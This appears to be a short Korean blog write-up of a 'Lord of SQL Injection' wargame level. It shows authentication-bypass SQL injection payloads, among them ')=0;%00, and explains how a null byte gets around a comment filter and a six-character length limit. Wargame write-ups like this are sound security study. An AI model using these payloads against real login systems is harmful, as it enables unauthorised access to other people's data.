pw길이가 6을 넘으면 안된다. 주석도 필터링되어 있다.
주석은 ;%00으로 우회할 수 있다.
pw을 참으로 만들기만 하면 문제가 풀린다.
pw를 닫아주고 참으로 만들어보려 했는데 어떻게 해도 자릿수가 넘어 힘들었다.
') or 1;%00
')||1;%00
pw=('')은 0을 리턴하므로 pw=('')=0을 하게 되면 쿼리가 참이 된다.
pw=')=0;%00
'Web Hacking > LoS' 카테고리의 다른 글
[Lord of SQL Injection] los zombie_assassin (0) | 2021.08.22 |
---|---|
[Lord of SQL Injection] los succubus (0) | 2021.08.15 |
[Lord of SQL Injection] los assassin (0) | 2021.08.03 |
[Lord of SQL Injection] los giant (0) | 2021.08.03 |
[Lord of SQL Injection] los bugbear (0) | 2021.08.01 |